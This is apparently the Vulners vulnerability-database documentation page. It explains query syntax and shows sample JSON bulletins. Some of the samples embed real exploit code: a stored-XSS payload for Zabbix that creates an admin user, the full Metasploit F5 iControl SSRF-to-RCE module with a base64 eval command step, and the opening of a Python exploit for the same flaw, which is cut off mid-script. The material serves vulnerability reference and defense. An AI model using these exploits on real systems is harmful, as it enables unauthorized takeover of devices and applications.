Skip to content

Welcome to Vulners

Vulners.com is the security database containing descriptions for large amount of software vulnerabilities in machine-readable format. Cross-references between bulletins and continuously updating of database keeps you abreast of the latest information security threats. These documentation pages will answer any questions you may have.

Lucene-based queries

Vulners database is based on search engine with Lucene queries which you can use in your queries:

  • AND "apache" AND "vulnerabilities"
  • OR "apache" OR "Lucene"
  • NOT NOT type:"robot"
  • Boolean Operators
  • Grouping (Lucene OR apache) AND website
  • Special characters + - && || ! ( ) { } [ ] ^ " ~ * ? : \
  • Range Searches status:[400 TO 499]

Below are some basic examples that will make it clearer. You may find them in the following examples.

Examples and search snippets

Main keywords

In examples you could find main keywords. Let's look at some of them:

  • type: Type of bulletin vendor, such as Debian, RedHat, ExploitDB, Metasploit etc… Format: String

  • bulletinFamily: Family of bulletin, such as Unix, Exploit, Info… Format: String

  • cvelist: The entire list of CVEs to which the bulletin is applied

  • title: bulletin title

  • description: May contain the required words for the query

  • cvss: CVSS Score of security bulletin.

    • score Format: Float
    • vector: Format: String
  • affectedSoftware: List of software which have subkeys

    • name: name of software. Format: String
    • version: version of software. Format: String
  • affectedPackage: List of package which have subkeys

    • packageName: Name of package. Format: String
    • packageVersion: Version of package. Format: String
    • packageFilename: Filename of package. Format: String
  • published: Date after security bulletin was published Format: Date YYYY-MM-DD

  • sourceData: Useful for exploits. Search in exploit source code

  • bounty: Hackerone.com bounty amount Format: Double

  • type:rst IOC feed contains default fields (published, tags, threat, descr, iocScore, etc) and specific fields for each IOC type:

    • ip: geodata, asn
    • url: default fields
    • domain: whois, geodata, asn

Vulners regularly update and add new key fields. In each bulletin, you can view these key fields:

Json view

Main keywords examples

  • Examples of type output:
type: Debian, RedHat, ExploitDB, Metasploit

Example link: [SECURITY] [DLA 2614-1] busybox security update

Json output:

{
  "result": "OK",
  "data": {
    "documents": {
      "DEBIAN:DLA-2614-1:BDB8D": {
        "id": "DEBIAN:DLA-2614-1:BDB8D",
        "bulletinFamily": "unix",
        "title": "[SECURITY] [DLA 2614-1] busybox security update",
        "description": "-------------------------------------------------------------------------\nDebian LTS Advisory DLA-2614-1                debian-lts@lists.debian.org\nhttps://www.debian.org/lts/security/                      Markus Koschany\nApril 01, 2021                                https://wiki.debian.org/LTS\n-------------------------------------------------------------------------\n\nPackage        : busybox\nVersion        : 1:1.22.0-19+deb9u2\nCVE ID         : CVE-2021-28831\nDebian Bug     : 986217\n\nThe gunzip decompressor of Busybox, tiny utilities for small and embedded\nsystems, mishandled the error bit on the huft_build result pointer, with a\nresultant invalid free or segmentation fault, via malformed gzip data. \n\nFor Debian 9 stretch, this problem has been fixed in version\n1:1.22.0-19+deb9u2.\n\nWe recommend that you upgrade your busybox packages.\n\nFor the detailed security status of busybox please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/busybox\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n",
        "published": "2021-04-01T22:00:09",
        "modified": "2021-04-01T22:00:09",
        "cvss": {
          "score": 5.0,
          "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"
        },
        "href": "https://lists.debian.org/debian-lts-announce/2021/debian-lts-announce-202104/msg00001.html",
        "reporter": "Debian",
        "references": [],
        "cvelist": [
          "CVE-2021-28831"
        ],
        "type": "debian",
        "lastseen": "2021-04-02T13:19:57",
        "edition": 1,
        "viewCount": 33,
        "enchantments": {
          "dependencies": {
            "references": [
              {
                "type": "cve",
                "idList": [
                  "CVE-2021-28831"
                ]
              },
              {
                "type": "fedora",
                "idList": [
                  "FEDORA:1DC3230E9890",
                  "FEDORA:EA31830F7ECB",
                  "FEDORA:4B7BA30CB296"
                ]
              },
              {
                "type": "archlinux",
                "idList": [
                  "ASA-202103-11",
                  "ASA-202103-12"
                ]
              },
              {
                "type": "nessus",
                "idList": [
                  "DEBIAN_DLA-2614.NASL",
                  "FEDORA_2021-D20C8A4730.NASL"
                ]
              }
            ],
            "modified": "2021-04-02T13:19:57",
            "rev": 2
          },
          "score": {
            "value": 5.2,
            "vector": "NONE",
            "modified": "2021-04-02T13:19:57",
            "rev": 2
          },
          "vulnersScore": 5.2
        },
        "affectedPackage": [
          {
            "OS": "Debian",
            "OSVersion": "9",
            "arch": "all",
            "operator": "lt",
            "packageFilename": "udhcpd_1:1.22.0-19+deb9u2_all.deb",
            "packageName": "udhcpd",
            "packageVersion": "1:1.22.0-19+deb9u2"
          },
          {
            "OS": "Debian",
            "OSVersion": "9",
            "arch": "all",
            "operator": "lt",
            "packageFilename": "busybox_1:1.22.0-19+deb9u2_all.deb",
            "packageName": "busybox",
            "packageVersion": "1:1.22.0-19+deb9u2"
          },
          {
            "OS": "Debian",
            "OSVersion": "9",
            "arch": "all",
            "operator": "lt",
            "packageFilename": "udhcpc_1:1.22.0-19+deb9u2_all.deb",
            "packageName": "udhcpc",
            "packageVersion": "1:1.22.0-19+deb9u2"
          },
          {
            "OS": "Debian",
            "OSVersion": "9",
            "arch": "all",
            "operator": "lt",
            "packageFilename": "busybox-static_1:1.22.0-19+deb9u2_all.deb",
            "packageName": "busybox-static",
            "packageVersion": "1:1.22.0-19+deb9u2"
          },
          {
            "OS": "Debian",
            "OSVersion": "9",
            "arch": "all",
            "operator": "lt",
            "packageFilename": "busybox-syslogd_1:1.22.0-19+deb9u2_all.deb",
            "packageName": "busybox-syslogd",
            "packageVersion": "1:1.22.0-19+deb9u2"
          }
        ]
      }
    }
  }
}

Example link: (RHSA-2021:0943) Moderate: Red Hat build of Eclipse Vert.x 4.0.3 security update

Json output:

{
  "result": "OK",
  "data": {
    "documents": {
      "RHSA-2021:0943": {
        "id": "RHSA-2021:0943",
        "type": "redhat",
        "bulletinFamily": "unix",
        "title": "(RHSA-2021:0943) Moderate: Red Hat build of Eclipse Vert.x 4.0.3 security update",
        "description": "This release of Red Hat build of Eclipse Vert.x 4.0.3 includes security updates, bug fixes, and enhancements. For more information, see the release notes listed in the References section.\n\nSecurity Fix(es):\n\n* netty: Information disclosure via the local system temporary directory (CVE-2021-21290)\n\n* netty: possible request smuggling in HTTP/2 due missing validation (CVE-2021-21295)\n\nFor more details about the security issues and their impact, the CVSS score, acknowledgements, and other related information, see the CVE pages listed in the References section.",
        "published": "2021-03-31T13:34:13",
        "modified": "2021-03-31T13:34:51",
        "cvss": {
          "score": 2.6,
          "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"
        },
        "href": "https://access.redhat.com/errata/RHSA-2021:0943",
        "reporter": "RedHat",
        "references": [],
        "cvelist": [
          "CVE-2021-21290",
          "CVE-2021-21295"
        ],
        "lastseen": "2021-03-31T10:28:30",
        "viewCount": 41,
        "enchantments": {
          "dependencies": {
            "references": [
              {
                "type": "cve",
                "idList": [
                  "CVE-2021-21295",
                  "CVE-2021-21290"
                ]
              },
              {
                "type": "redhat",
                "idList": [
                  "RHSA-2021:0986"
                ]
              },
              {
                "type": "github",
                "idList": [
                  "GHSA-WM47-8V5P-WJPJ",
                  "GHSA-5MCR-GQ6C-3HQ2"
                ]
              },
              {
                "type": "nessus",
                "idList": [
                  "OPENSUSE-2021-448.NASL",
                  "DEBIAN_DLA-2555.NASL"
                ]
              },
              {
                "type": "debian",
                "idList": [
                  "DEBIAN:DLA-2555-1:DBD69"
                ]
              }
            ],
            "modified": "2021-03-31T10:28:30",
            "rev": 2
          },
          "score": {
            "value": 4.9,
            "vector": "NONE",
            "modified": "2021-03-31T10:28:30",
            "rev": 2
          },
          "vulnersScore": 4.9
        },
        "affectedPackage": []
      }
    }
  }
}

Example link: Zabbix 3.4.7 - Stored XSS

Json output:

{
  "result": "OK",
  "data": {
    "documents": {
      "EDB-ID:49729": {
        "id": "EDB-ID:49729",
        "type": "exploitdb",
        "bulletinFamily": "exploit",
        "title": "Zabbix 3.4.7 - Stored XSS",
        "description": "",
        "published": "2021-03-31T00:00:00",
        "modified": "2021-03-31T00:00:00",
        "cvss": {
          "score": 6.4,
          "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"
        },
        "href": "https://www.exploit-db.com/exploits/49729",
        "reporter": "Exploit-DB",
        "references": [],
        "cvelist": [
          "CVE-2019-17382"
        ],
        "lastseen": "2021-03-31T08:29:46",
        "viewCount": 244,
        "enchantments": {
          "dependencies": {
            "references": [
              {
                "type": "cve",
                "idList": [
                  "CVE-2019-17382"
                ]
              },
              {
                "type": "packetstorm",
                "idList": [
                  "PACKETSTORM:162032"
                ]
              }
            ],
            "modified": "2021-03-31T08:29:46",
            "rev": 2
          },
          "score": {
            "value": 4.9,
            "vector": "NONE",
            "modified": "2021-03-31T08:29:46",
            "rev": 2
          },
          "vulnersScore": 4.9
        },
        "sourceHref": "https://www.exploit-db.com/download/49729",
        "sourceData": "# Exploit Title: Zabbix 3.4.7 - Stored XSS\r\n# Date: 30-03-2021\r\n# Exploit Author: Radmil Gazizov\r\n# Vendor Homepage: https://www.zabbix.com/\r\n# Software Link: https://www.zabbix.com/rn/rn3.4.7\r\n# Version: 3.4.7\r\n# Tested on: Linux\r\n\r\n# Reference -\r\nhttps://github.com/GloryToMoon/POC_codes/blob/main/zabbix_stored_xss_347.txt\r\n\r\n1- Go to /zabbix/zabbix.php?action=dashboard.list (anonymous login CVE-2019-17382)\r\n2- Create new dashboard\r\n3- Add a new widget => Type: Map nabigation tree\r\n4- Past into parameter \"Name\": <img src=\"x\" onerror=\"var n='hck',q=jQuery;q.post('users.php',{sid:q('#sid').attr('value'),form:'Create+user',alias:n,name:n,surname:n,'user_groups[]':7,password1:n,password2:n,theme:'default',refresh:'9s',rows_per_page:9,url:'',user_type:3,add:'Add'});\">\r\n5- Click to \"Add\" button",
        "osvdbidlist": []
      }
    }
  }
}

Example link: F5 iControl REST Unauthenticated SSRF Token Generation RCE

Json output:

{
  "result": "OK",
  "data": {
    "documents": {
      "MSF:EXPLOIT/LINUX/HTTP/F5_ICONTROL_REST_SSRF_RCE/": {
        "id": "MSF:EXPLOIT/LINUX/HTTP/F5_ICONTROL_REST_SSRF_RCE/",
        "type": "metasploit",
        "bulletinFamily": "exploit",
        "title": "F5 iControl REST Unauthenticated SSRF Token Generation RCE",
        "description": "This module exploits a pre-auth SSRF in the F5 iControl REST API's /mgmt/shared/authn/login endpoint to generate an X-F5-Auth-Token that can be used to execute root commands on an affected BIG-IP or BIG-IQ device. This vulnerability is known as CVE-2021-22986. CVE-2021-22986 affects the following BIG-IP versions: * 12.1.0 - 12.1.5 * 13.1.0 - 13.1.3 * 14.1.0 - 14.1.3 * 15.1.0 - 15.1.2 * 16.0.0 - 16.0.1 And the following BIG-IQ versions: * 6.0.0 - 6.1.0 * 7.0.0 * 7.1.0 Tested against BIG-IP Virtual Edition 16.0.1 in VMware Fusion.\n",
        "published": "2021-03-31T19:02:32",
        "modified": "2021-03-31T19:02:32",
        "cvss": {
          "score": 0.0,
          "vector": "NONE"
        },
        "href": "",
        "reporter": "Rapid7",
        "references": [],
        "cvelist": [
          "CVE-2021-22986"
        ],
        "lastseen": "2021-04-01T18:34:34",
        "viewCount": 19,
        "enchantments": {
          "dependencies": {
            "references": [
              {
                "type": "cve",
                "idList": [
                  "CVE-2021-22986"
                ]
              },
              {
                "type": "attackerkb",
                "idList": [
                  "AKB:930A50FF-16A2-4EA8-91C8-71360A643E5E"
                ]
              },
              {
                "type": "impervablog",
                "idList": [
                  "IMPERVABLOG:3D5A9B1B55D73BE6810D0DB036F8B83F"
                ]
              },
              {
                "type": "nessus",
                "idList": [
                  "F5_BIGIP_SOL03009991.NASL"
                ]
              },
              {
                "type": "packetstorm",
                "idList": [
                  "PACKETSTORM:162066",
                  "PACKETSTORM:162059"
                ]
              },
              {
                "type": "exploitdb",
                "idList": [
                  "EDB-ID:49738"
                ]
              },
              {
                "type": "thn",
                "idList": [
                  "THN:D31DB501A57ADE0C1DBD12724D8CA44C",
                  "THN:4959B86491B72239BCAF1958D167D57D"
                ]
              },
              {
                "type": "cisa",
                "idList": [
                  "CISA:A55091A825D08BAA55750010D4193771"
                ]
              },
              {
                "type": "threatpost",
                "idList": [
                  "THREATPOST:1D03F5885684829E899CEE4F63F5AC27",
                  "THREATPOST:BC4ECD6616ADCCFFD5717D0A9A0D065B"
                ]
              },
              {
                "type": "rapid7blog",
                "idList": [
                  "RAPID7BLOG:72759E1136A76135F26DD97485912606",
                  "RAPID7BLOG:764CA6BDCBE5F8F001B5E508AE0659CC"
                ]
              }
            ],
            "modified": "2021-04-01T18:34:34",
            "rev": 2
          },
          "score": {
            "value": 6.6,
            "vector": "NONE",
            "modified": "2021-04-01T18:34:34",
            "rev": 2
          },
          "vulnersScore": 6.6
        },
        "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/f5_icontrol_rest_ssrf_rce.rb",
        "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n  Rank = ExcellentRanking\n\n  prepend Msf::Exploit::Remote::AutoCheck\n  include Msf::Exploit::Remote::HttpClient\n  include Msf::Exploit::CmdStager\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        'Name' => 'F5 iControl REST Unauthenticated SSRF Token Generation RCE',\n        'Description' => %q{\n          This module exploits a pre-auth SSRF in the F5 iControl REST API's\n          /mgmt/shared/authn/login endpoint to generate an X-F5-Auth-Token that\n          can be used to execute root commands on an affected BIG-IP or BIG-IQ\n          device. This vulnerability is known as CVE-2021-22986.\n\n          CVE-2021-22986 affects the following BIG-IP versions:\n\n          * 12.1.0 - 12.1.5\n          * 13.1.0 - 13.1.3\n          * 14.1.0 - 14.1.3\n          * 15.1.0 - 15.1.2\n          * 16.0.0 - 16.0.1\n\n          And the following BIG-IQ versions:\n\n          * 6.0.0 - 6.1.0\n          * 7.0.0\n          * 7.1.0\n\n          Tested against BIG-IP Virtual Edition 16.0.1 in VMware Fusion.\n        },\n        'Author' => [\n          'wvu', # Analysis and exploit\n          'Rich Warren' # First blood (RCE) and endpoint collaboration\n        ],\n        'References' => [\n          ['CVE', '2021-22986'],\n          ['URL', 'https://support.f5.com/csp/article/K03009991'],\n          ['URL', 'https://attackerkb.com/assessments/f6b19d24-b24e-4abd-98cf-2988d7424311'],\n          ['URL', 'https://research.nccgroup.com/2021/03/18/rift-detection-capabilities-for-recent-f5-big-ip-big-iq-icontrol-rest-api-vulnerabilities-cve-2021-22986/']\n          # https://clouddocs.f5.com/products/big-iq/mgmt-api/v7.0.0/ApiReferences/bigiq_public_api_ref/r_auth_login.html\n        ],\n        'DisclosureDate' => '2021-03-10', # Vendor advisory\n        'License' => MSF_LICENSE,\n        'Platform' => ['unix', 'linux'],\n        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n        'Privileged' => true,\n        'Targets' => [\n          [\n            'Unix Command',\n            {\n              'Platform' => 'unix',\n              'Arch' => ARCH_CMD,\n              'Type' => :unix_cmd,\n              'DefaultOptions' => {\n                'PAYLOAD' => 'cmd/unix/reverse_python_ssl'\n              }\n            }\n          ],\n          [\n            'Linux Dropper',\n            {\n              'Platform' => 'linux',\n              'Arch' => [ARCH_X86, ARCH_X64],\n              'Type' => :linux_dropper,\n              'DefaultOptions' => {\n                'CMDSTAGER::FLAVOR' => :bourne,\n                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n              }\n            }\n          ]\n        ],\n        'DefaultTarget' => 0,\n        'DefaultOptions' => {\n          'SSL' => true\n        },\n        'Notes' => {\n          'Stability' => [CRASH_SAFE],\n          'Reliability' => [REPEATABLE_SESSION], # Only one concurrent session\n          'SideEffects' => [\n            IOC_IN_LOGS, # /var/log/restjavad.0.log (rotated)\n            ACCOUNT_LOCKOUTS, # Unlikely with bigipAuthCookie\n            ARTIFACTS_ON_DISK # CmdStager\n          ]\n        }\n      )\n    )\n\n    register_options([\n      Opt::RPORT(443),\n      OptString.new('TARGETURI', [true, 'Base path', '/']),\n      OptString.new('USERNAME', [true, 'Valid admin username', 'admin']),\n      OptString.new('ENDPOINT', [false, 'Custom token generation endpoint'])\n    ])\n\n    register_advanced_options([\n      OptFloat.new('CmdExecTimeout', [true, 'Command execution timeout', 3.5])\n    ])\n  end\n\n  def username\n    datastore['USERNAME']\n  end\n\n  def user_reference_endpoint\n    normalize_uri(target_uri.path, '/mgmt/shared/authz/users', username)\n  end\n\n  def check\n    generate_token_ssrf ? CheckCode::Vulnerable : CheckCode::Safe\n  end\n\n  def exploit\n    return unless (@token ||= generate_token_ssrf)\n\n    print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n    case target['Type']\n    when :unix_cmd\n      execute_command(payload.encoded)\n    when :linux_dropper\n      execute_cmdstager\n    end\n  end\n\n  def generate_token_ssrf\n    print_status('Generating token via SSRF...')\n    vprint_status(\"Username: #{username}\")\n    vprint_status(\"Endpoint: #{login_reference_endpoint}\")\n\n    res = send_request_cgi(\n      'method' => 'POST',\n      'uri' => normalize_uri(target_uri.path, '/mgmt/shared/authn/login'),\n      'ctype' => 'application/json',\n      'data' => {\n        'username' => username,\n        'bigipAuthCookie' => '',\n        'authProviderName' => 'local',\n        'loginReference' => {\n          'link' => \"https://localhost#{login_reference_endpoint}\"\n        },\n        'userReference' => {\n          'link' => \"https://localhost#{user_reference_endpoint}\"\n        }\n      }.to_json\n    )\n\n    unless res&.code == 200 && (@token = res.get_json_document.dig('token', 'token'))\n      print_error('Failed to generate token')\n      return\n    end\n\n    print_good(\"Successfully generated token: #{@token}\")\n    @token\n  end\n\n  def execute_command(cmd, _opts = {})\n    bash_cmd = \"eval $(echo #{Rex::Text.encode_base64(cmd)} | base64 -d)\"\n\n    print_status(\"Executing command: #{bash_cmd}\")\n\n    res = send_request_cgi({\n      'method' => 'POST',\n      'uri' => normalize_uri(target_uri.path, '/mgmt/tm/util/bash'),\n      'ctype' => 'application/json',\n      'headers' => {\n        'X-F5-Auth-Token' => @token\n      },\n      'data' => {\n        'command' => 'run',\n        'utilCmdArgs' => \"-c '#{bash_cmd}'\"\n      }.to_json\n    }, datastore['CmdExecTimeout'])\n\n    unless res\n      vprint_warning('Command execution timed out')\n      return\n    end\n\n    unless res.code == 200 && res.get_json_document['kind'] == 'tm:util:bash:runstate'\n      fail_with(Failure::PayloadFailed, 'Failed to execute command')\n    end\n\n    print_good('Successfully executed command')\n\n    return unless (cmd_result = res.get_json_document['commandResult'])\n\n    vprint_line(cmd_result)\n  end\n\n  def login_reference_endpoint\n    if datastore['ENDPOINT']\n      return normalize_uri(target_uri.path, datastore['ENDPOINT'])\n    end\n\n    @token_generation_endpoint ||= token_generation_endpoints.sample\n\n    normalize_uri(target_uri.path, @token_generation_endpoint)\n  end\n\n  # Usable token generation endpoints between versions 12.1.4 and 16.0.1\n  def token_generation_endpoints\n    %w[\n      /access/file-path-manager/indexing\n      /cm/autodeploy/cluster-software-images/indexing\n      /cm/autodeploy/qkview/indexing\n      /cm/autodeploy/software-images/indexing\n      /cm/autodeploy/software-volume-install/indexing\n      /cm/system/authn/providers/tmos/1f44a60e-11a7-3c51-a49f-82983026b41b/users/indexing\n      /cm/system/authn/providers/tmos/indexing\n      /mgmt/shared/analytics/avr-proxy-tasks\n      /mgmt/shared/gossip\n      /mgmt/shared/gossip-peer-refresher\n      /mgmt/shared/identified-devices/config/device-refresh\n      /mgmt/shared/save-config\n      /mgmt/tm/shared/bigip-failover-state\n      /shared/analytics/avr-proxy-tasks\n      /shared/analytics/avr-proxy-tasks/indexing\n      /shared/analytics/event-aggregation-tasks/indexing\n      /shared/analytics/event-analysis-tasks/indexing\n      /shared/authn/providers/local/groups/indexing\n      /shared/authz/remote-resources/indexing\n      /shared/authz/resource-groups/indexing\n      /shared/authz/roles/indexing\n      /shared/authz/tokens/indexing\n      /shared/chassis-framework-upgrades/indexing\n      /shared/device-discovery-tasks/indexing\n      /shared/device-group-key-pairs/indexing\n      /shared/echo/indexing\n      /shared/framework-info-tasks/indexing\n      /shared/framework-upgrades/indexing\n      /shared/gossip\n      /shared/gossip-peer-refresher\n      /shared/group-task/indexing\n      /shared/iapp/blocks/indexing\n      /shared/iapp/build-package/indexing\n      /shared/iapp/health-prefix-map/indexing\n      /shared/iapp/package-management-tasks/indexing\n      /shared/iapp/template-loader/indexing\n      /shared/identified-devices/config/device-refresh\n      /shared/nodejs/loader-path-config/indexing\n      /shared/package-deployments/indexing\n      /shared/resolver/device-groups/indexing\n      /shared/resolver/device-groups/tm-shared-all-big-ips/devices/indexing\n      /shared/root-framework-upgrades/indexing\n      /shared/rpm-tasks/indexing\n      /shared/save-config\n      /shared/snapshot-task/indexing\n      /shared/snapshot/indexing\n      /shared/stats-information/indexing\n      /shared/storage/tasks/indexing\n      /shared/task-scheduler/scheduler/indexing\n      /shared/tmsh-shell/indexing\n      /tm/analytics/afm-sweeper/generate-report/indexing\n      /tm/analytics/afm-sweeper/report-results/indexing\n      /tm/analytics/application-security-anomalies/generate-report/indexing\n      /tm/analytics/application-security-anomalies/report-results/indexing\n      /tm/analytics/application-security-network/generate-report/indexing\n      /tm/analytics/application-security-network/report-results/indexing\n      /tm/analytics/application-security/generate-report/indexing\n      /tm/analytics/application-security/report-results/indexing\n      /tm/analytics/asm-bypass/generate-report/indexing\n      /tm/analytics/asm-bypass/report-results/indexing\n      /tm/analytics/asm-cpu/generate-report/indexing\n      /tm/analytics/asm-cpu/report-results/indexing\n      /tm/analytics/asm-memory/generate-report/indexing\n      /tm/analytics/asm-memory/report-results/indexing\n      /tm/analytics/cpu/generate-report/indexing\n      /tm/analytics/cpu/report-results/indexing\n      /tm/analytics/disk-info/generate-report/indexing\n      /tm/analytics/disk-info/report-results/indexing\n      /tm/analytics/dns/generate-report/indexing\n      /tm/analytics/dns/report-results/indexing\n      /tm/analytics/dos-l3/generate-report/indexing\n      /tm/analytics/dos-l3/report-results/indexing\n      /tm/analytics/http/generate-report/indexing\n      /tm/analytics/http/report-results/indexing\n      /tm/analytics/ip-intelligence/generate-report/indexing\n      /tm/analytics/ip-intelligence/report-results/indexing\n      /tm/analytics/ip-layer/generate-report/indexing\n      /tm/analytics/ip-layer/report-results/indexing\n      /tm/analytics/lsn-pool/generate-report/indexing\n      /tm/analytics/lsn-pool/report-results/indexing\n      /tm/analytics/memory/generate-report/indexing\n      /tm/analytics/memory/report-results/indexing\n      /tm/analytics/network/generate-report/indexing\n      /tm/analytics/network/report-results/indexing\n      /tm/analytics/pem/generate-report/indexing\n      /tm/analytics/pem/report-results/indexing\n      /tm/analytics/proc-cpu/generate-report/indexing\n      /tm/analytics/proc-cpu/report-results/indexing\n      /tm/analytics/protocol-security-http/generate-report/indexing\n      /tm/analytics/protocol-security-http/report-results/indexing\n      /tm/analytics/protocol-security/generate-report/indexing\n      /tm/analytics/protocol-security/report-results/indexing\n      /tm/analytics/sip/generate-report/indexing\n      /tm/analytics/sip/report-results/indexing\n      /tm/analytics/swg-blocked/generate-report/indexing\n      /tm/analytics/swg-blocked/report-results/indexing\n      /tm/analytics/swg/generate-report/indexing\n      /tm/analytics/swg/report-results/indexing\n      /tm/analytics/tcp-analytics/generate-report/indexing\n      /tm/analytics/tcp-analytics/report-results/indexing\n      /tm/analytics/tcp/generate-report/indexing\n      /tm/analytics/tcp/report-results/indexing\n      /tm/analytics/udp/generate-report/indexing\n      /tm/analytics/udp/report-results/indexing\n      /tm/analytics/vcmp/generate-report/indexing\n      /tm/analytics/vcmp/report-results/indexing\n      /tm/analytics/virtual/generate-report/indexing\n      /tm/analytics/virtual/report-results/indexing\n      /tm/shared/bigip-failover-state\n      /tm/shared/sys/backup/indexing\n    ]\n  end\n\nend\n",
        "metasploitReliability": "",
        "metasploitHistory": ""
      }
    }
  }
}

  • Examples of bulletinFamily output:
bulletinFamily: Unix, Exploit, News, Tools

Example link: [SECURITY] Fedora 33 Update: kernel-tools-5.11.11-200.fc33

Json output:

{
  "result": "OK",
  "data": {
    "documents": {
      "FEDORA:9081130C99AB": {
        "id": "FEDORA:9081130C99AB",
        "type": "fedora",
        "bulletinFamily": "unix",
        "title": "[SECURITY] Fedora 33 Update: kernel-tools-5.11.11-200.fc33",
        "description": "This package contains the tools/ directory from the kernel source and the supporting documentation. ",
        "published": "2021-04-02T01:22:21",
        "modified": "2021-04-02T01:22:21",
        "cvss": {
          "score": 0.0,
          "vector": "NONE"
        },
        "href": "",
        "reporter": "Fedora",
        "references": [],
        "cvelist": [
          "CVE-2021-29646",
          "CVE-2021-29647",
          "CVE-2021-29648",
          "CVE-2021-29649",
          "CVE-2021-29650"
        ],
        "lastseen": "2021-04-02T22:46:17",
        "viewCount": 19,
        "enchantments": {
          "dependencies": {
            "references": [
              {
                "type": "fedora",
                "idList": [
                  "FEDORA:076F830528F3",
                  "FEDORA:74FD430C99A1",
                  "FEDORA:604C9309D33B",
                  "FEDORA:208C6306A247",
                  "FEDORA:B309B305D40A",
                  "FEDORA:E66B630C998B",
                  "FEDORA:DEF49309BE28",
                  "FEDORA:7A7D4309D9BC"
                ]
              },
              {
                "type": "cve",
                "idList": [
                  "CVE-2021-29646",
                  "CVE-2021-29649",
                  "CVE-2021-29647",
                  "CVE-2021-29650",
                  "CVE-2021-29648"
                ]
              }
            ],
            "modified": "2021-04-02T22:46:17",
            "rev": 2
          },
          "score": {
            "value": 4.7,
            "vector": "NONE",
            "modified": "2021-04-02T22:46:17",
            "rev": 2
          },
          "vulnersScore": 4.7
        },
        "affectedPackage": [
          {
            "OS": "Fedora",
            "OSVersion": "33",
            "arch": "any",
            "packageName": "kernel-tools",
            "packageVersion": "5.11.11",
            "packageFilename": "UNKNOWN",
            "operator": "lt"
          }
        ]
      }
    }
  }
}

Example link: F5 BIG-IP 16.0.x Remote Code Execution

Json output:

{
  "result": "OK",
  "data": {
    "documents": {
      "PACKETSTORM:162066": {
        "id": "PACKETSTORM:162066",
        "type": "packetstorm",
        "bulletinFamily": "exploit",
        "title": "F5 BIG-IP 16.0.x Remote Code Execution",
        "description": "",
        "published": "2021-04-02T00:00:00",
        "modified": "2021-04-02T00:00:00",
        "cvss": {
          "score": 0.0,
          "vector": "NONE"
        },
        "href": "https://packetstormsecurity.com/files/162066/F5-BIG-IP-16.0.x-Remote-Code-Execution.html",
        "reporter": "Al1ex",
        "references": [],
        "cvelist": [
          "CVE-2021-22986"
        ],
        "lastseen": "2021-04-02T14:19:05",
        "viewCount": 90,
        "enchantments": {
          "dependencies": {
            "references": [
              {
                "type": "cve",
                "idList": [
                  "CVE-2021-22986"
                ]
              },
              {
                "type": "attackerkb",
                "idList": [
                  "AKB:930A50FF-16A2-4EA8-91C8-71360A643E5E"
                ]
              },
              {
                "type": "impervablog",
                "idList": [
                  "IMPERVABLOG:3D5A9B1B55D73BE6810D0DB036F8B83F"
                ]
              },
              {
                "type": "nessus",
                "idList": [
                  "F5_BIGIP_SOL03009991.NASL"
                ]
              },
              {
                "type": "metasploit",
                "idList": [
                  "MSF:EXPLOIT/LINUX/HTTP/F5_ICONTROL_REST_SSRF_RCE/"
                ]
              },
              {
                "type": "exploitdb",
                "idList": [
                  "EDB-ID:49738"
                ]
              },
              {
                "type": "packetstorm",
                "idList": [
                  "PACKETSTORM:162059"
                ]
              },
              {
                "type": "thn",
                "idList": [
                  "THN:D31DB501A57ADE0C1DBD12724D8CA44C",
                  "THN:4959B86491B72239BCAF1958D167D57D"
                ]
              },
              {
                "type": "cisa",
                "idList": [
                  "CISA:A55091A825D08BAA55750010D4193771"
                ]
              },
              {
                "type": "threatpost",
                "idList": [
                  "THREATPOST:BC4ECD6616ADCCFFD5717D0A9A0D065B",
                  "THREATPOST:1D03F5885684829E899CEE4F63F5AC27"
                ]
              },
              {
                "type": "rapid7blog",
                "idList": [
                  "RAPID7BLOG:764CA6BDCBE5F8F001B5E508AE0659CC",
                  "RAPID7BLOG:72759E1136A76135F26DD97485912606"
                ]
              }
            ],
            "modified": "2021-04-02T14:19:05",
            "rev": 2
          },
          "score": {
            "value": 6.5,
            "vector": "NONE",
            "modified": "2021-04-02T14:19:05",
            "rev": 2
          },
          "vulnersScore": 6.5
        },
        "sourceHref": "https://packetstormsecurity.com/files/download/162066/f5bigip16-exec.txt",
        "sourceData": "`# Exploit Title: F5 BIG-IP 16.0.x - iControl REST Remote Code Execution (Unauthenticated)  \n# Exploit Author: Al1ex  \n# Vendor Homepage: https://www.f5.com/products/big-ip-services  \n# Version: 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3 amd BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2  \n# CVE : CVE-2021-22986  \n  \nimport requests  \nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning  \nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)  \nimport sys  \n  \n  \ndef title():  \nprint('''  \n______ ____ ____ _______ ___ ___ ___ __ ___ ___ ___ ___ __   \n/ |\\ \\ / / | ____| |__ \\ / _ \\ |__ \\ /_ | |__ \\ |__ \\ / _ \\ / _ \\ / /   \n| ,----' \\ \\/ / | |__ ______ ) | | | | | ) | | | ______ ) | ) | | (_) | | (_) | / /_   \n| | \\ / | __| |______/ / | | | | / / | | |______/ / / / \\__, | > _ < | '_ \\   \n| `----. \\ / | |____ / /_ | |_| | / /_ | | / /_ / /_ / / | (_) | | (_) |   \n\\______| \\__/ |_______| |____| \\___/ |____| |_| |____| |____| /_/ \\___/ \\___/   \n  \nAuthor:Al1ex@Heptagram  \nGithub:https://github.com/Al1ex  \n''')   \n  \ndef exploit(url):  \ntarget_url = url + '/mgmt/shared/authn/login'  \ndata = {  \n\"bigipAuthCookie\":\"\",  